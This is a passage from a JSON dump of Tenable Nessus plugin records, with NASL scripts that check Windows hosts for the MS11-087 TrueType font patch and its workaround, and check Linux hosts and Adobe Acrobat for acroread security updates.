Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ARCH\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n# This script has been disabled and is intended to be blank.\n# Disabled on 2011/12/23. Deprecated by smb_nt_ms11-087.nasl.\nexit(0, \"Deprecated - replaced by smb_nt_ms11-087.nasl\");\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nACCESS_DENIED_ACE_TYPE = 1; # this should probably be put into an include file\n\n##\n# Opens the given file. Assumes an absolute path will be given and\n# the caller has already connected to the appropriate share.\n#\n# @anonparam path pathname of the file to open\n#\n# @return file handle for 'path' if it exists could be opened,\n# NULL otherwise\n##\nfunction open_file()\n{\n local_var path, fh;\n path = substr(_FCT_ANON_ARGS[0], 2); # strip leading drive information\n\n fh = CreateFile(\n file:path,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n return fh;\n}\n\n##\n# Gets the DACL of the given file\n#\n# @anonparam fh handle of the file to obtain the DACL for\n#\n# @return DACL associated with 'fh'\n##\nfunction get_dacl()\n{\n local_var fh, sd, dacl;\n fh = _FCT_ANON_ARGS[0];\n\n sd = GetSecurityInfo(handle:fh, level:DACL_SECURITY_INFORMATION);\n if (isnull(sd))\n {\n debug_print(\"Unable to access security descriptor.\");\n return NULL;\n }\n \n dacl = sd[3];\n if (isnull(dacl))\n {\n debug_print(\"Unable to retrieve DACL.\");\n return NULL;\n }\n \n dacl = parse_pdacl(blob:dacl);\n if (isnull(dacl))\n {\n debug_print(\"Error parsing DACL.\");\n return NULL;\n }\n\n return dacl;\n}\n\n##\n# Checks the permissions of the given file to see if the workaround\n# from MS KB2639658 is being used\n#\n# @anonparam path pathname of the file to check\n#\n# @return TRUE if the file exists and the workaround is not in place,\n# FALSE otherwise\n##\nfunction workaround_missing()\n{\n local_var path, fh, dacl, ace, sid, rights, type;\n path = _FCT_ANON_ARGS[0];\n\n fh = open_file(path);\n if (isnull(fh))\n {\n debug_print('Unable to open ' + path);\n return FALSE;\n }\n\n dacl = get_dacl(fh);\n CloseFile(handle:fh);\n if (isnull(dacl))\n {\n debug_print('Unable to get DACL for ' + path);\n return FALSE;\n }\n\n foreach ace (dacl)\n {\n ace = parse_dacl(blob:ace);\n if (isnull(ace))\n {\n debug_print(\"Error parsing ACE.\");\n continue;\n }\n \n rights = ace[0];\n type = ace[3];\n sid = sid2string(sid:ace[1]);\n if (isnull(sid))\n {\n debug_print(1, \"Error parsing SID.\");\n continue;\n }\n \n # Explicitly check for the workaround:\n # a 1) an deny ACE 2) for Everyone 3) for full access\n if (\n type == ACCESS_DENIED_ACE_TYPE &&\n sid == '1-1-0' &&\n rights & FILE_ALL_ACCESS == FILE_ALL_ACCESS\n )\n {\n return FALSE; # workaround exists, therefore workaround_missing is FALSE\n }\n }\n \n return TRUE; # if the ACE created by the workaround wasn't seen, the workaround is missing\n}\n \nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp(xp:4, win2003:3, vista:3, win7:2) <= 0) exit(0, 'Host is not affected based on its version / service pack.');\nif (hotfix_check_server_core() == 1) exit(0, \"Windows Server Core installs are not affected.\");\n\narch = get_kb_item_or_exit('SMB/ARCH');\nroot = hotfix_get_systemroot();\npaths = NULL;\n\nif (hotfix_check_sp(xp:4, win2003:3) > 0)\n{\n # For 32-bit systems, enter the following command at an administrative command prompt:\n # Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N\n if (arch == 'x86')\n paths = make_list(root + \"\\system32\\t2embed.dll\");\n\n # For 64-bit systems, enter the following command from an administrative command prompt:\n # Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N\n # Echo y| cacls \"%windir%\\syswow64\\t2embed.dll\" /E /P everyone:N\n if (arch == 'x64')\n paths = make_list(root + \"\\system32\\t2embed.dll\", root + \"\\syswow64\\t2embed.dll\");\n}\nelse if (hotfix_check_sp(vista:3, win7:2) > 0)\n{\n # For 32-bit systems, enter the following command at an administrative command prompt:\n # Takeown.exe /f \"%windir%\\system32\\t2embed.dll\"\n # Icacls.exe \"%windir%\\system32\\t2embed.dll\" /deny everyone:(F)\n if (arch == 'x86')\n paths = make_list(root + \"\\system32\\t2embed.dll\");\n\n # For 64-bit systems, enter the following command at an administrative command prompt:\n # Takeown.exe /f \"%windir%\\system32\\t2embed.dll\"\n # Icacls.exe \"%windir%\\system32\\t2embed.dll\" /deny everyone:(F)\n # Takeown.exe /f \"%windir%\\syswow64\\t2embed.dll\"\n # Icacls.exe \"%windir%\\syswow64\\t2embed.dll\" /deny everyone:(F)\n if (arch == 'x64')\n paths = make_list(root + \"\\system32\\t2embed.dll\", root + \"\\syswow64\\t2embed.dll\");\n}\n\nif (isnull(paths))\n exit(0, 'The version of Windows installed on this host doesn\\'t appear to be affected.');\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:root);\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nif (!get_port_state(port))exit(1, \"Port \"+port+\" is not open.\");\n\nsoc = open_sock_tcp(port);\nif (!soc)exit(1, \"Failed to open a socket on port \"+port+\".\");\n\nsession_init(socket:soc, hostname:name);\nr = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif ( r != 1 )\n{\n NetUseDel();\n exit(1, \"Unable to access the '\" + share + \"' share.\");\n}\n\nvuln_paths = make_list();\n\nforeach path (paths)\n{\n if (workaround_missing(path))\n vuln_paths = make_list(vuln_paths, path);\n} \n\nNetUseDel();\n\nif (max_index(vuln_paths) == 0)\n{\n exit(0, 'The host is not affected.');\n}\nelse\n{\n if (max_index(vuln_paths) == 1) s = ' has';\n else s = 's have';\n\n report = '\\nThe following file' + s + ' not been modified by the workaround :\\n\\n' + join(vuln_paths, sep:'\\n') + '\\n';\n security_hole(port:port, extra:report);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:44", "description": "The remote host is running a version of the Windows kernel that is affected by a remote code execution vulnerability. Specially crafted TrueType fonts are not properly handled, which could allow arbitrary code execution in kernel mode. A remote attacker could exploit this vulnerability by tricking a user into viewing a specially crafted TrueType font (e.g., via web or email).\n\nThis vulnerability is reportedly being exploited in the wild by the Duqu malware.", "cvss3": {}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "MS11-087: Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS11-087.NASL", "href": "https://www.tenable.com/plugins/nessus/57273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57273);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_xref(name:\"CERT\", value:\"316553\");\n script_xref(name:\"MSFT\", value:\"MS11-087\");\n script_xref(name:\"MSKB\", value:\"2639417\");\n\n script_name(english:\"MS11-087: Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)\");\n script_summary(english:\"Checks version of win32k.sys\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows kernel is affected by a remote code execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running a version of the Windows kernel that is\naffected by a remote code execution vulnerability. Specially crafted\nTrueType fonts are not properly handled, which could allow arbitrary\ncode execution in kernel mode. A remote attacker could exploit this\nvulnerability by tricking a user into viewing a specially crafted\nTrueType font (e.g., via web or email).\n\nThis vulnerability is reportedly being exploited in the wild by the Duqu\nmalware.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.crysys.hu/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.symantec.com/connect/w32_duqu_precursor_next_stuxnet\");\n # https://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5829938d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2011/2639658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-087\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS11-087';\nkb = '2639417';\n\nkbs = make_list(kb);\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.21866\", min_version:\"6.1.7601.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.17730\", min_version:\"6.1.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Win32k.sys\", version:\"6.1.7600.21097\", min_version:\"6.1.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Win32k.sys\", version:\"6.1.7600.16920\", min_version:\"6.1.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.22745\", min_version:\"6.0.6002.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.18544\", min_version:\"6.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Win32k.sys\", version:\"5.2.3790.4938\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP 32-bit\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Win32k.sys\", version:\"5.1.2600.6178\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:46:10", "description": "This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified vulnerability that possibly allowed remote code execution.", "cvss3": {}, "published": "2010-03-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : acroread (acroread-2068)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_cn", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_tw", "cpe:/o:novell:opensuse:11.2"], "id": "SUSE_11_2_ACROREAD-100225.NASL", "href": "https://www.tenable.com/plugins/nessus/44981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2068.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44981);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-2068)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - CVE-2010-0186: CVSS v2 Base Score: 5.8 Cross-domain\n request vulnerability\n\n - CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified\n vulnerability that possibly allowed remote code\n execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=580470\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected acroread packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-cmaps-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ja-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ko-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_CN-9.3.1-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_TW-9.3.1-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:45:28", "description": "Updated acroread packages that fix two security issues and a bug are now available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable Document Format (PDF).\n\nThis update fixes two vulnerabilities in Adobe Reader. These vulnerabilities are summarized on the Adobe Security Advisory APSB10-07 page listed in the References section. A specially crafted PDF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-0186, CVE-2010-0188)\n\nThis update also fixes a bug where, on some systems, attempting to install or upgrade the acroread packages failed due to a package dependency issue. (BZ#557506)\n\nAll Adobe Reader users should install these updated packages. They contain Adobe Reader version 9.3.1, which is not vulnerable to these issues and fixes this bug. All running instances of Adobe Reader must be restarted for the update to take effect.", "cvss3": {}, "published": "2010-02-19T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 : acroread (RHSA-2010:0114)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:acroread", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:acroread-plugin", "cpe:/o:redhat:enterprise_linux:5.4", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2010-0114.NASL", "href": "https://www.tenable.com/plugins/nessus/44665", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0114. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44665);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_bugtraq_id(38195, 38198);\n script_xref(name:\"RHSA\", value:\"2010:0114\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 4 / 5 : acroread (RHSA-2010:0114)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated acroread packages that fix two security issues and a bug are\nnow available for Red Hat Enterprise Linux 4 Extras and Red Hat\nEnterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes two vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-07 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-0186, CVE-2010-0188)\n\nThis update also fixes a bug where, on some systems, attempting to\ninstall or upgrade the acroread packages failed due to a package\ndependency issue. (BZ#557506)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.3.1, which is not vulnerable to these\nissues and fixes this bug. All running instances of Adobe Reader must\nbe restarted for the update to take effect.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-0186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-0188\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb10-07.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2010:0114\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected acroread and / or acroread-plugin packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0188\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0114\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3.1-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3.1-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.3.1-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3.1-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:44:48", "description": "The version of Adobe Acrobat installed on the remote host is earlier than 9.3.1 / 8.2.1. Such versions are reportedly affected by multiple vulnerabilities :\n\n - An issue that could subvert the domain sandbox and make unauthorized cross-domain requests. (CVE-2010-0186)\n\n - An unspecified vulnerability could cause the application to crash or possibly lead to arbitrary code execution.\n (CVE-2010-0188)", "cvss3": {}, "published": "2010-02-17T00:00:00", "type": "nessus", "title": "Adobe Acrobat < 9.3.1 / 8.2.1 Multiple Vulnerabilities (APSB10-07)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB10-07.NASL", "href": "https://www.tenable.com/plugins/nessus/44643", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44643);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_bugtraq_id(38195, 38198);\n script_xref(name:\"Secunia\", value:\"38551\");\n 